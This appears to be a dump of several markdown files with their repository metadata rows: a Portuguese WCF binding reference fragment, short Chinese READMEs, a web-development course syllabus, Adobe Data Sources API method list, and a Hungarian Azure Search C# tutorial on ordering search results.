|[\<readerQuotas>](https://msdn.microsoft.com/library/3e5e42ff-cef8-478f-bf14-034449239bfd)|Define as restrições na complexidade das mensagens SOAP que pontos de extremidade configurados com essa associação podem processar. Esse elemento é do tipo <xref:System.ServiceModel.Configuration.XmlDictionaryReaderQuotasElement>.|
|[reliableSession](https://msdn.microsoft.com/library/9c93818a-7dfa-43d5-b3a1-1aafccf3a00b)|Especifica se as sessões confiáveis são estabelecidas entre pontos de extremidade de canal.|
### <a name="parent-elements"></a>Elementos pai
|Elemento|Descrição|
|-------------|-----------------|
|[\<associações >](../../../../../docs/framework/configure-apps/file-schema/wcf/bindings.md)|Esse elemento contém uma coleção de associações padrão e personalizadas.|
## <a name="remarks"></a>Comentários
O `WS2007HttpBinding` adiciona uma associação fornecida pelo sistema semelhante ao `WSHttpBinding` mas utiliza a organização para as versões padrão do avanço dos Structured Information Standards (OASIS) dos protocolos TransactionFlow, ReliableSession e segurança. Nenhuma alteração para as configurações padrão ou de modelo de objeto é necessária ao usar essa associação.
## <a name="example"></a>Exemplo
```xml
<configuration>
<system.ServiceModel>
<bindings>
<ws2007HttpBinding>
<binding
closeTimeout="00:00:10"
openTimeout="00:00:20"
receiveTimeout="00:00:30"
sendTimeout="00:00:40"
bypassProxyOnLocal="false"
transactionFlow="false"
hostNameComparisonMode="WeakWildcard"
maxReceivedMessageSize="1000"
messageEncoding="Mtom"
proxyAddress="http://www.contoso.com"
textEncoding="utf-16"
useDefaultWebProxy="false">
<reliableSession ordered="false"
inactivityTimeout="00:02:00"
enabled="true" />
<security mode="Transport">
<transport clientCredentialType="Digest"
proxyCredentialType="None"
realm="someRealm" />
<message clientCredentialType="Windows"
negotiateServiceCredential="false"
algorithmSuite="Aes128"
defaultProtectionLevel="None" />
</security>
</binding>
</ws2007HttpBinding>
</bindings>
</system.ServiceModel>
</configuration>
```
## <a name="see-also"></a>Consulte também
<xref:System.ServiceModel.WS2007HttpBinding>
<xref:System.ServiceModel.Configuration.WS2007HttpBindingElement>
[Associações](../../../../../docs/framework/wcf/bindings.md)
[Configurando associações fornecidas pelo sistema](../../../../../docs/framework/wcf/feature-details/configuring-system-provided-bindings.md)
[Usando associações para configurar clientes e serviços do Windows Communication Foundation](https://msdn.microsoft.com/library/bd8b277b-932f-472f-a42a-b02bb5257dfb)
[\<associação >](../../../../../docs/framework/misc/binding.md)
| 77.625 | 610 | 0.693684 | por_Latn | 0.956221 |
97839d1afb2234661d3187367cae110f31b4de73 | 176 | md | Markdown | README.md | zhoushaowen/SWMultiController | 4c579e6848f48f8a4dc0adfcdd28312c00918059 | [
"Apache-2.0"
] | 1 | 2018-04-27T08:49:25.000Z | 2018-04-27T08:49:25.000Z | README.md | zhoushaowen/SWMultiController | 4c579e6848f48f8a4dc0adfcdd28312c00918059 | [
"Apache-2.0"
] | null | null | null | README.md | zhoushaowen/SWMultiController | 4c579e6848f48f8a4dc0adfcdd28312c00918059 | [
"Apache-2.0"
] | null | null | null | # SWMultiController
可以左右滑动的多控制器,支持屏幕旋转和storyboard
#### pod 'SWMultiController'

截图 | 22 | 91 | 0.795455 | yue_Hant | 0.177242 |
97840a98000daad14a1a0baa5706db62abfd2702 | 70 | md | Markdown | scripts/README.md | yayxs/vue | 8e4d665f816ca7a59585c2151bd3588998c223a7 | [
"MIT"
] | null | null | null | scripts/README.md | yayxs/vue | 8e4d665f816ca7a59585c2151bd3588998c223a7 | [
"MIT"
] | null | null | null | scripts/README.md | yayxs/vue | 8e4d665f816ca7a59585c2151bd3588998c223a7 | [
"MIT"
] | null | null | null | 构建相关的文件
git-hooks git 钩子的目录
alias.js 别名配置
config 生成rollup配置的文件
build | 11.666667 | 20 | 0.828571 | nno_Latn | 0.171965 |
978458b4783a9ab035a4b7925243e6ddd075e7eb | 1,888 | md | Markdown | README.md | CACLD-Bhubaneswar/web-development-training | 11a9b7ac05a026f9a3b1e7e76fa511e53636fa2d | [
"MIT"
] | null | null | null | README.md | CACLD-Bhubaneswar/web-development-training | 11a9b7ac05a026f9a3b1e7e76fa511e53636fa2d | [
"MIT"
] | null | null | null | README.md | CACLD-Bhubaneswar/web-development-training | 11a9b7ac05a026f9a3b1e7e76fa511e53636fa2d | [
"MIT"
] | 1 | 2020-09-12T20:18:46.000Z | 2020-09-12T20:18:46.000Z | # CACLD Web Development Training
Course material of CACLD Web Development Training
Register for the course here: http://www.cacld.co.in
## Module 1 : Getting Started with HTML- 8 hrs
* Web 2.0, web 3.0, Domain Name and Domain Name Server
* Web Development Design Principles and Guidelines
* Current Web Design Trends from HTML 1.0 to HTML5
* What is HTML 5?
* Elements, tag , attributes, images, Hyperlink
* HTML5 List and forms
* HTML5 Graphics
* HTML 5 Basic APIs
## Module 2 : Getting Started with CSS- 10 hrs
* What and Why it is called CSS?
* Why is CSS important?
* CSS Rule
* Incorporating CSS in HTML page
* Using HTML classes and IDs
* CSS box model and CSS outline
* Layout and Positioning
* Responsive Design using CSS
## Module 3 : Getting Started with JavaScript- 12 hrs
* JavaScript, HTML5 and CSS3
* JavaScript overview
* Your first HTML/CSS/JS page
* Variables, values, functions, operators, and expressions
* Conditional statements, loops and logical operators
* Functions and CallBacks
* Organizing the code in separate files : html,css and javascript
* Building and Validating the Login and Sign Form
* Integration of SignForm with Facebook and Gmail
* JSON Notation
## Module 4 : Getting Started with MySQL- 6 hrs
* Installation and Configuration of MySQL
* Creation of Table using DDL
* Insert, Delete and Update queries
* Creation of SQL Script
## Module 5 : Getting Started with PHP- 12 hrs
* Introduction of PHP
* Variables, Data types and expressions, Arrays
* Conditional statements
* Connecting with MySQL Database
* Insert, Update and retrieve to/from MySQL database
* Sending Email, Cookies and Sessions
## Module 6 : Building your own responsive website- 10 hrs
## Module 7 : Hosting your website- 2 hrs
* Finding your Domain and Hosting Space
* Uploading and configuration your website using godaddy, etc
* How to increase your website hits ?
| 29.5 | 65 | 0.763771 | eng_Latn | 0.832815 |
97849b590ad1c6b749a320b67734bf25322bc9dc | 1,787 | md | Markdown | docs/data-sources-api/methods/c_data_sources_methods.md | inselaffe/analytics-1.4-apis | 272af09811cefdab7d597d9d1e42b2f0235ca7aa | [
"MIT"
] | 1 | 2021-02-08T01:27:55.000Z | 2021-02-08T01:27:55.000Z | docs/data-sources-api/methods/c_data_sources_methods.md | inselaffe/analytics-1.4-apis | 272af09811cefdab7d597d9d1e42b2f0235ca7aa | [
"MIT"
] | 1 | 2021-02-23T11:10:08.000Z | 2021-02-23T11:49:30.000Z | docs/data-sources-api/methods/c_data_sources_methods.md | inselaffe/analytics-1.4-apis | 272af09811cefdab7d597d9d1e42b2f0235ca7aa | [
"MIT"
] | null | null | null | # Methods
Methods for Data Sources 1.3.
- **[SetupFull](../methods/r_setupFull.md)**
Creates a new full processing data source.
- **[SetupTraffic](../methods/r_setupTraffic.md)**
Creates a new Traffic Data Source.
- **[SetupWebLog](../methods/r_setupWebLog.md)**
Creates a new WebLog Data Source.
- **[SetupGeneric](../methods/r_setupGeneric.md)**
Creates a new Generic Data Source.
- **[GetIDs](../methods/r_getIDs.md)**
Returns a list of data source IDs associated with the specified report suite.
- **[GetInfo](../methods/r_getInfo.md)**
Returns information about the data sources associated with the specified report suite.
- **[BeginDataBlock](../methods/r_beginDataBlock.md)**
Submits the first HTTP data block in a Data Sources submission.
- **[AppendDataBlock](../methods/r_appendDataBlock.md)**
Appends an additional HTTP data block to a Data Sources data submission.
- **[ProcessIncompleteVisits](../methods/r_processIncompleteVisits.md)**
Instructs Data Sources to process data related to site visits that did not end in the current file or data block.
- **[GetFileIDs](../methods/r_getFileIDs.md)**
Returns a list of files or data blocks submitted to the specified data source.
- **[GetFileInfo](../methods/r_getFileInfo.md)**
Returns information about the files submitted to the specified data source.
- **[GetFileStatus](../methods/r_getFileStatus.md)**
Returns status information about the files submitted to the specified data source.
- **[Restart](../methods/r_restart.md)**
Restarts processing of the specified Full Processing data source.
- **[Deactivate](../methods/r_deactivate.md)**
Deactivates the specified data source.
**Parent topic:** [Data Sources Version 1.3](../c_data_sources_api_1_3.md)
| 49.638889 | 113 | 0.730834 | eng_Latn | 0.571401 |
9785e6181a63a905e8e12ac10c14542f012946c3 | 47,576 | md | Markdown | articles/search/tutorial-csharp-orders.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-09-29T16:59:33.000Z | 2019-09-29T16:59:33.000Z | articles/search/tutorial-csharp-orders.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/search/tutorial-csharp-orders.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: C#az oktatóanyag az Azure Search – az eredmények rendezése
description: Ebben az oktatóanyagban a "Keresési eredmények tördelés – az Azure Search" projekt hozzáadása a keresési eredmények rendezése épül. Ismerje meg, hogyan eredmények megrendelési, egy elsődleges tulajdonságot, és az eredmények, amelyek ugyanazt a primary tulajdonságot, egy másodlagos tulajdonság eredmények rendezésének módját. Végül megtudhatja, hogyan sorrendjének eredményeit a pontozási profilok alapján.
services: search
ms.service: search
ms.topic: tutorial
ms.author: v-pettur
author: PeterTurcan
ms.date: 06/21/2019
ms.openlocfilehash: 32e253b4e131d753ab6937d0aa2a49bda471e091
ms.sourcegitcommit: c63e5031aed4992d5adf45639addcef07c166224
ms.translationtype: MT
ms.contentlocale: hu-HU
ms.lasthandoff: 06/28/2019
ms.locfileid: "67466578"
---
# <a name="c-tutorial-order-the-results---azure-search"></a>C#oktatóanyag: Az eredmények – Azure Search ORDER
Innentől sorozatunk oktatóanyagokban másnapi eredmények visszaadott és egy alapértelmezett sorrendben jelennek meg. Ez lehet a sorrendben, ahol az adatok is található, vagy akár egy alapértelmezett _relevanciaprofil_ lett meghatározva, amely használja, amikor nincs sorbarendezésre paraméterek vannak megadva. Ebben az oktatóanyagban megnyitjuk sorrendjének eredményeket egy elsődleges tulajdonságot, majd az eredmények, amelyek ugyanazt a primary tulajdonságot, hogyan lehet egy másodlagos tulajdonság a kijelölési rendezésének módját. Numerikus értékek alapján rendezés helyett, a végső példa bemutatja, hogyan sorrendjének egyéni pontozási profilok alapján. Azt is lépnek egy kicsit részletesebben megjelenítésének _komplex típusok_.
Annak érdekében, hogy a visszaadott eredmények összehasonlítása egyszerűen, a projekt alakzatot a létrehozott végtelen görgethető projektet hoz létre a [ C# oktatóanyag: Keresési eredmények tördelés – Azure Search](tutorial-csharp-paging.md) oktatóanyag.
Eben az oktatóanyagban az alábbiakkal fog megismerkedni:
> [!div class="checklist"]
> * Egyetlen tulajdonság alapján eredményeket
> * Több tulajdonság alapján eredményeket
> * Szűrheti az eredményeket egy földrajzi pont távolságra alapján
> * Rendelés eredményeket a pontozási profilok
## <a name="prerequisites"></a>Előfeltételek
Az oktatóanyag elvégzéséhez a következőkre lesz szüksége:
Végtelen görgethető verziója a [ C# oktatóanyag: Keresési eredmények tördelés – Azure Search](tutorial-csharp-paging.md) projektet, majd futtassa. Ez a projekt a saját verzióját, vagy telepítheti a Githubról: [Első alkalmazás létrehozása](https://github.com/Azure-Samples/azure-search-dotnet-samples).
## <a name="order-results-based-on-one-property"></a>Egyetlen tulajdonság alapján eredményeket
Azt rendelés eredményeket egy tulajdonságot, például: Szálloda minősítés, hogy nem szeretné, hogy csak a rendezett eredményeket ad vissza, is szeretnénk, hogy helyesen szerepel-e a rendelés megerősítő. Más szóval azt order minősítés, ha azt kell megjelenítenie a minősítés a nézetet.
Ebben az oktatóanyagban is hozzáadjuk egy kicsit több, a megjelenített eredmények, a legolcsóbb szoba sebesség és az egyes Szálloda a legköltségesebb szoba aránya. A nézetet, hogy elmélyedhet rendelési, azt is hozzáadja, győződjön meg arról, mi a Microsoft vannak rendezés értékeket is megjelenik.
Nem, nem szükséges, módosíthatja a modellek rendezés engedélyezése. A nézet és a tartományvezérlő kell frissíteni. Először nyissa meg az otthoni vezérlő.
### <a name="add-the-orderby-property-to-the-search-parameters"></a>A keresési paraméterek az OrderBy tulajdonság hozzáadása
1. Rendelés eredmények egy-egy numerikus tulajdonság, alapján történő csak állítsa be a **OrderBy** paramétert a tulajdonság nevét. Az a **Index (SearchData modell)** metódust, adja hozzá az alábbi sort a keresési paraméterek.
```cs
OrderBy = new[] { "Rating desc" },
```
>[!Note]
> Az alapértelmezett iránya növekvő, bár hozzáadhat **asc** egyértelművé teszi, ez a tulajdonság. Csökkenő sorrendbe van megadva hozzáadásával **desc**.
2. Most futtassa az alkalmazást, és minden olyan gyakori keresési kifejezést adja meg. Előfordulhat, hogy az eredményeket, vagy nem lehet a megfelelő sorrendben sem, fejlesztőként, nem a felhasználó rendelkezik minden olyan egyszerűen megoldható az eredmények ellenőrzése!
3. Ellenőrizze, hogy törölje az eredményeket a minősítéshez vannak rendezve. Első lépésként cserélje le a **Téglalap1** és **Téglalap2** osztályok a hotels.css fájlban a következő osztályok (ezeket az osztályokat szükségünk ebben az oktatóanyagban az összes újakat).
```html
textarea.box1A {
width: 324px;
height: 32px;
border: none;
background-color: azure;
font-size: 14pt;
color: blue;
padding-left: 5px;
text-align: left;
}
textarea.box1B {
width: 324px;
height: 32px;
border: none;
background-color: azure;
font-size: 14pt;
color: blue;
text-align: right;
padding-right: 5px;
}
textarea.box2A {
width: 324px;
height: 32px;
border: none;
background-color: azure;
font-size: 12pt;
color: blue;
padding-left: 5px;
text-align: left;
}
textarea.box2B {
width: 324px;
height: 32px;
border: none;
background-color: azure;
font-size: 12pt;
color: blue;
text-align: right;
padding-right: 5px;
}
textarea.box3 {
width: 648px;
height: 100px;
border: none;
background-color: azure;
font-size: 12pt;
padding-left: 5px;
margin-bottom: 24px;
}
```
>[!Tip]
>Böngészők általában gyorsítótárazzák a css-fájlokat, és a egy régi használt css-fájlt, és figyelmen kívül hagyja a módosítások vezet. Round Ez egy jó módja, hogy a hivatkozás hozzáadása egy verzió paramétere egy lekérdezési karakterláncot. Példa:
>
>```html
> <link rel="stylesheet" href="~/css/hotels.css?v1.1" />
>```
>
>A verziószám frissítéséhez, ha úgy véli, hogy a böngésző egy régi css-fájl használatban van.
4. Adja hozzá a **minősítés** tulajdonságot a **kiválasztása** paraméter, a a **Index (SearchData modell)** metódus.
```cs
Select = new[] { "HotelName", "Description", "Rating"},
```
5. Nyissa meg a nézet (index.cshtml), és cserélje le a renderelési hurok ( **<!--megjelenítése az szállodában.-->** ) a következő kóddal.
```cs
<!-- Show the hotel data. -->
@for (var i = 0; i < Model.resultList.Results.Count; i++)
{
var ratingText = $"Rating: {Model.resultList.Results[i].Document.Rating}";
// Display the hotel details.
@Html.TextArea($"name{i}", Model.resultList.Results[i].Document.HotelName, new { @class = "box1A" })
@Html.TextArea($"rating{i}", ratingText, new { @class = "box1B" })
@Html.TextArea($"desc{i}", Model.resultList.Results[i].Document.Description, new { @class = "box3" })
}
```
6. A minősítés kell lennie az első megjelenő lap, és a is, amelyek segítségével a végtelen görgessen az úgynevezett következő lapjain elérhető. Az utóbbi két ezekben a helyzetekben esetében egyaránt frissíteni kell a **tovább** művelet a vezérlő és a **görgetéséhez** függvény a nézetben. A vezérlő kezdve módosítani a **tovább** metódust a következő kódot. Ez a kód létrehozza, és kommunikál a minősítés szöveget.
```cs
public async Task<ActionResult> Next(SearchData model)
{
// Set the next page setting, and call the Index(model) action.
model.paging = "next";
await Index(model);
// Create an empty list.
var nextHotels = new List<string>();
// Add a hotel details to the list.
for (int n = 0; n < model.resultList.Results.Count; n++)
{
var ratingText = $"Rating: {model.resultList.Results[n].Document.Rating}";
// Add three strings to the list.
nextHotels.Add(model.resultList.Results[n].Document.HotelName);
nextHotels.Add(ratingText);
nextHotels.Add(model.resultList.Results[n].Document.Description);
}
// Rather than return a view, return the list of data.
return new JsonResult(nextHotels);
}
```
7. Most frissítse a **görgetéséhez** függvény a nézetben, a minősítő szöveg megjelenítéséhez.
```javascript
<script>
function scrolled() {
if (myDiv.offsetHeight + myDiv.scrollTop >= myDiv.scrollHeight) {
$.getJSON("/Home/Next", function (data) {
var div = document.getElementById('myDiv');
// Append the returned data to the current list of hotels.
for (var i = 0; i < data.length; i += 3) {
div.innerHTML += '\n<textarea class="box1A">' + data[i] + '</textarea>';
div.innerHTML += '\n<textarea class="box1B">' + data[i + 1] + '</textarea>';
div.innerHTML += '\n<textarea class="box3">' + data[i + 2] + '</textarea>';
}
});
}
}
</script>
```
8. Most futtassa újra az alkalmazást. Keresés az összes gyakori kifejezés, például a "Wi-Fi", és győződjön meg arról, hogy az eredmények csökkenő sorrendben Szálloda minősítés szerint vannak rendezve:.

Megfigyelheti, hogy több hotels van egy azonos minősítése, és így jelennek meg a megjelenésüket újra a sorrendet, amelyben az adatok található, amely tetszőleges.
Mi megvizsgáljuk a második szintű rendezése hozzáadása, mielőtt adjunk néhány kódot szoba díjak tartományán megjelenítéséhez. Hozzáadjuk ezt a kódot, mind az adatok kinyerése megjelenítése egy _komplex típus_, és is így is megbeszélhetünk rendezése eredmények alapján ár (legolcsóbb első talán).
### <a name="add-the-range-of-room-rates-to-the-view"></a>A nézet szoba mértékek a tartomány hozzáadása
1. Adja hozzá a legolcsóbb és legköltségesebb szoba sebességét, a Hotel.cs modellre tartalmazó tulajdonságot.
```cs
// Room rate range
public double cheapest { get; set; }
public double expensive { get; set; }
```
2. Végén a szoba díjak számítása a **Index (SearchData modell)** az otthoni vezérlő a művelet. Adja hozzá a számítások ideiglenes adatok tárolása után.
```cs
// Ensure TempData is stored for the next call.
TempData["page"] = page;
TempData["searchfor"] = model.searchText;
// Calculate the room rate ranges.
for (int n = 0; n < model.resultList.Results.Count; n++)
{
// Calculate room rates.
var cheapest = 0d;
var expensive = 0d;
for (var r = 0; r < model.resultList.Results[n].Document.Rooms.Length; r++)
{
var rate = model.resultList.Results[n].Document.Rooms[r].BaseRate;
if (rate < cheapest || cheapest == 0)
{
cheapest = (double)rate;
}
if (rate > expensive)
{
expensive = (double)rate;
}
}
model.resultList.Results[n].Document.cheapest = cheapest;
model.resultList.Results[n].Document.expensive = expensive;
}
```
3. Adja hozzá a **termek** tulajdonságot a **kiválasztása** paramétert a **Index (SearchData modell)** a vezérlő tartozó műveleti módszer.
```cs
Select = new[] { "HotelName", "Description", "Rating", "Rooms" },
```
4. Módosítsa a megjelenítési ciklus a nézetben megjelenítendő eredmények első oldala arány tartományát.
```cs
<!-- Show the hotel data. -->
@for (var i = 0; i < Model.resultList.Results.Count; i++)
{
var rateText = $"Rates from ${Model.resultList.Results[i].Document.cheapest} to ${Model.resultList.Results[i].Document.expensive}";
var ratingText = $"Rating: {Model.resultList.Results[i].Document.Rating}";
// Display the hotel details.
@Html.TextArea($"name{i}", Model.resultList.Results[i].Document.HotelName, new { @class = "box1A" })
@Html.TextArea($"rating{i}", ratingText, new { @class = "box1B" })
@Html.TextArea($"rates{i}" , rateText, new { @class = "box2A" })
@Html.TextArea($"desc{i}", Model.resultList.Results[i].Document.Description, new { @class = "box3" })
}
```
5. Módosítsa a **tovább** metódus az otthoni vezérlő a tartományt, az eredmények azt követő lapokon az.
```cs
public async Task<ActionResult> Next(SearchData model)
{
// Set the next page setting, and call the Index(model) action.
model.paging = "next";
await Index(model);
// Create an empty list.
var nextHotels = new List<string>();
// Add a hotel details to the list.
for (int n = 0; n < model.resultList.Results.Count; n++)
{
var ratingText = $"Rating: {model.resultList.Results[n].Document.Rating}";
var rateText = $"Rates from ${model.resultList.Results[n].Document.cheapest} to ${model.resultList.Results[n].Document.expensive}";
// Add strings to the list.
nextHotels.Add(model.resultList.Results[n].Document.HotelName);
nextHotels.Add(ratingText);
nextHotels.Add(rateText);
nextHotels.Add(model.resultList.Results[n].Document.Description);
}
// Rather than return a view, return the list of data.
return new JsonResult(nextHotels);
}
```
6. Frissítés a **görgetéséhez** függvény a nézetben, a hely kezeléséhez a szöveg értékeli.
```javascript
<script>
function scrolled() {
if (myDiv.offsetHeight + myDiv.scrollTop >= myDiv.scrollHeight) {
$.getJSON("/Home/Next", function (data) {
var div = document.getElementById('myDiv');
// Append the returned data to the current list of hotels.
for (var i = 0; i < data.length; i += 4) {
div.innerHTML += '\n<textarea class="box1A">' + data[i] + '</textarea>';
div.innerHTML += '\n<textarea class="box1B">' + data[i + 1] + '</textarea>';
div.innerHTML += '\n<textarea class="box2A">' + data[i + 2] + '</textarea>';
div.innerHTML += '\n<textarea class="box3">' + data[i + 4] + '</textarea>';
}
});
}
}
</script>
```
7. Futtassa az alkalmazást, és ellenőrizze a szoba arány tartományok jelennek meg.

A **OrderBy** a keresési paraméterek tulajdonsága nem fogad el egy bejegyzés például **Rooms.BaseRate** biztosít a legolcsóbb szoba sebességét, még akkor is, ha a termek volt már alapján vannak rendezve, sebessége (ami nem azok). A minta adatkészletben, rendelt hely arány, a szállodák megjelenítéséhez meg kellene szűrje az eredményeket az otthoni vezérlőben, és ezeket az eredményeket elküldik a nézet a kívánt sorrendben.
## <a name="order-results-based-on-multiple-values"></a>Rendelés eredmények több érték alapján
Most már a kérdés, hogyan lehet az azonos minősítéssel rendelkező hotels megkülönböztetéséhez. Jó lenne sorrend alapján Szálloda volt felújított utoljára. Más szóval a újabban Szálloda volt felújított, annál nagyobb Szálloda megjelenik az eredmények között.
1. Adja hozzá a második szintű rendezése, módosítsa a **OrderBy** és **válassza ki** tulajdonságait a **Index (SearchData modell)** metódus tartalmazza a **LastRenovationDate** tulajdonság.
```cs
OrderBy = new[] { "Rating desc", "LastRenovationDate desc" },
Select = new[] { "HotelName", "Description", "Rating", "Rooms", "LastRenovationDate" },
```
>[!Tip]
>Tetszőleges számú tulajdonságok is megadni a **OrderBy** listája. Ha hotels felújítás dátum és az azonos minősítése, egy harmadik tulajdonság különböztetheti lehetett megadni.
2. Ismét meg kell tekintse meg a felújítás dátumot a nézetben csak bizonyos, a rendezés helyességéről. Az ilyen olyan, mint egy felújítás valószínűleg csak az év szükség. Módosítsa a nézetben a renderelési ciklus a következő kódot.
```cs
<!-- Show the hotel data. -->
@for (var i = 0; i < Model.resultList.Results.Count; i++)
{
var rateText = $"Rates from ${Model.resultList.Results[i].Document.cheapest} to ${Model.resultList.Results[i].Document.expensive}";
var lastRenovatedText = $"Last renovated: { Model.resultList.Results[i].Document.LastRenovationDate.Value.Year}";
var ratingText = $"Rating: {Model.resultList.Results[i].Document.Rating}";
// Display the hotel details.
@Html.TextArea($"name{i}", Model.resultList.Results[i].Document.HotelName, new { @class = "box1A" })
@Html.TextArea($"rating{i}", ratingText, new { @class = "box1B" })
@Html.TextArea($"rates{i}" , rateText, new { @class = "box2A" })
@Html.TextArea($"renovation{i}", lastRenovatedText, new { @class = "box2B" })
@Html.TextArea($"desc{i}", Model.resultList.Results[i].Document.Description, new { @class = "box3" })
}
```
3. Módosítsa a **tovább** metódus az otthoni a vezérlő, továbbítsa a legutóbbi felújítás dátum az év összetevőt.
```cs
public async Task<ActionResult> Next(SearchData model)
{
// Set the next page setting, and call the Index(model) action.
model.paging = "next";
await Index(model);
// Create an empty list.
var nextHotels = new List<string>();
// Add a hotel details to the list.
for (int n = 0; n < model.resultList.Results.Count; n++)
{
var ratingText = $"Rating: {model.resultList.Results[n].Document.Rating}";
var rateText = $"Rates from ${model.resultList.Results[n].Document.cheapest} to ${model.resultList.Results[n].Document.expensive}";
var lastRenovatedText = $"Last renovated: {model.resultList.Results[n].Document.LastRenovationDate.Value.Year}";
// Add strings to the list.
nextHotels.Add(model.resultList.Results[n].Document.HotelName);
nextHotels.Add(ratingText);
nextHotels.Add(rateText);
nextHotels.Add(lastRenovatedText);
nextHotels.Add(model.resultList.Results[n].Document.Description);
}
// Rather than return a view, return the list of data.
return new JsonResult(nextHotels);
}
```
4. Módosítsa a **görgetéséhez** függvény a nézetben a felújítás szöveg megjelenítéséhez.
```javascript
<script>
function scrolled() {
if (myDiv.offsetHeight + myDiv.scrollTop >= myDiv.scrollHeight) {
$.getJSON("/Home/Next", function (data) {
var div = document.getElementById('myDiv');
// Append the returned data to the current list of hotels.
for (var i = 0; i < data.length; i += 5) {
div.innerHTML += '\n<textarea class="box1A">' + data[i] + '</textarea>';
div.innerHTML += '\n<textarea class="box1B">' + data[i + 1] + '</textarea>';
div.innerHTML += '\n<textarea class="box2A">' + data[i + 2] + '</textarea>';
div.innerHTML += '\n<textarea class="box2B">' + data[i + 3] + '</textarea>';
div.innerHTML += '\n<textarea class="box3">' + data[i + 4] + '</textarea>';
}
});
}
}
</script>
```
5. Futtassa az alkalmazást. Keressen a "készlet" vagy "view", például egy gyakori kifejezés, és ellenőrizze, hogy az azonos minősítéssel rendelkező hotels most már megjelenik felújítás dátum szerinti csökkenő sorrendben.

## <a name="filter-results-based-on-a-distance-from-a-geographical-point"></a>Szűrheti az eredményeket egy földrajzi pont távolságra alapján
Értékelések és felújítás dátum, csökkenő sorrendben legjobb megjelenő tulajdonságok példák. Egy betűrend szerinti lista lenne, növekvő sorrendben jól használható példa (például akkor, ha csak az egyik történt **OrderBy** tulajdonság- és állították be **Mezőmeghatározása** majd megjelenik egy betűrendbe rendezése ). Azonban a mintaadatokat a távolság egy földrajzi pont a megfelelőbb lenne.
Földrajzi távolságtól eredményeket megjeleníteni, több lépésre szükség.
1. Szűrje ki egy szűrőt hosszúság, szélesség és a radius-paraméterek megadásával az adott pont a megadott sugarú kívül esnek "Hotels". A pont függvény első elbírálása hosszúság. Adja meg kilométerben RADIUS van.
```cs
// "Location" must match the field name in the Hotel class.
// Distance (the radius) is in kilometers.
// Point order is Longitude then Latitude.
Filter = $"geo.distance(Location, geography'POINT({model.lon} {model.lat})') le {model.radius}",
```
2. Az a fenti szűrő _nem_ távolság alapján az eredményt, a kiugró értékek csupán eltávolítja. Az eredmények sorrendjének, adja meg egy **OrderBy** beállítás, amely meghatározza a geoDistance metódust.
```cs
OrderBy = new[] { $"geo.distance(Location, geography'POINT({model.lon} {model.lat})') asc" },
```
3. Bár az adott vissza eredményt Azure Search egy távolság szűrővel, van-e az adatok és az adott pont számított távolságát _nem_ adja vissza. Számítsa ki újra a nézet vagy egy tartományvezérlő, ezt az értéket, ha azt szeretné, hogy megjelenjen az eredményeket.
Az alábbi kód kiszámítja két szél/maga pontok közötti távolság.
```cs
const double EarthRadius = 6371;
public static double Degrees2Radians(double deg)
{
return deg * Math.PI / 180;
}
public static double DistanceInKm( double lat1, double lon1, double lat2, double lon2)
{
double dlon = Degrees2Radians(lon2 - lon1);
double dlat = Degrees2Radians(lat2 - lat1);
double a = (Math.Sin(dlat / 2) * Math.Sin(dlat / 2)) + Math.Cos(Degrees2Radians(lat1)) * Math.Cos(Degrees2Radians(lat2)) * (Math.Sin(dlon / 2) * Math.Sin(dlon / 2));
double angle = 2 * Math.Atan2(Math.Sqrt(a), Math.Sqrt(1 - a));
return angle * EarthRadius;
}
```
4. Már az alapelveket összekapcsolása. Azonban ezeket kódrészletek szerint létrehozásához kerül, a jelen oktatóanyagban egy térkép-alapú alkalmazás az olvasó gyakorlatként marad. Hogy ebben a példában további, fontolja meg, írja be a RADIUS-szal, egy város nevét, vagy egy pontot megkereséséhez a térképen, és válassza a radius. Ezek a lehetőségek további vizsgálatához az alábbi forrásanyagokban talál:
* [Az Azure Maps dokumentációja](https://docs.microsoft.com/azure/azure-maps/)
* [Keresse meg egy címet az Azure Maps search szolgáltatással](https://docs.microsoft.com/azure/azure-maps/how-to-search-for-address)
## <a name="order-results-based-on-a-scoring-profile"></a>Rendelés eredményeket a pontozási profilok
Az eddig az oktatóanyag során megadott példák bemutatják, hogyan numerikus értékeket (minősítés, felújítás dátum, földrajzi távolságtól), így a sorrendjének egy _pontos_ érzetét feldolgozása. Azonban néhány keresések és néhány adatot nem alkalmasak az ilyen két adatelem egy egyszerű összehasonlítása. Az Azure Search beletartoznak a _pontozási_. _Pontozási profilok_ adható meg, amelyek segítségével több összetett és minőségi összehasonlításokat, kell lennie a legértékesebb, ha tegyük fel, döntenie kell lennie, amely szöveges adatok összehasonlításával jelenik meg először adja meg egy adatkészletet.
Pontozási profilok nincsenek meghatározva a felhasználók, de általában a rendszergazdák egy adatkészlet. A "Hotels" adatok több pontozási profilok van beállítva. Most nézzük, hogyan van definiálva a relevanciaprofil, majd próbálkozzon a kódírás őket a kereséshez.
### <a name="how-scoring-profiles-are-defined"></a>Hogyan pontozási profilok vannak definiálva.
Nézzük tekintse meg a pontozási profilok három példákat, és fontolja meg a hogyan történik az egyes _kell_ eredmények sorrendje befolyásolja. Alkalmazásfejlesztőként akkor ne írja ki ezeket a profilokat, az adatok rendszergazdája megírásának, azonban hasznos lehet, tekintse meg a szintaxist.
1. Ez a relevanciaprofil használatos, ha nem ad meg bármelyik hotels adatkészlet az alapértelmezett **OrderBy** vagy **ScoringProfile** paraméter. Ez a profil felgyorsíthatók a _pontszám_ egy szállodai Vendég, ha a keresett szöveget a Szálloda neve, leírása vagy címkék (eszközök) listája megtalálható az. Figyelje meg, hogy bizonyos mezők alkalmazást hogyan állítja a pontozás súlyozását. Ha a keresett szöveg jelenik meg egy másik mező, a listában nem szereplő 1 súlyozási fog rendelkezni. Természetesen minél nagyobb a pontszám, a korábban egy eredményt a nézetben jelenik meg.
```cs
{
"name": "boostByField",
"text": {
"weights": {
"HotelName": 2,
"Description": 1.5,
"Description_fr": 1.5,
"Tags": 3
}
}
}
```
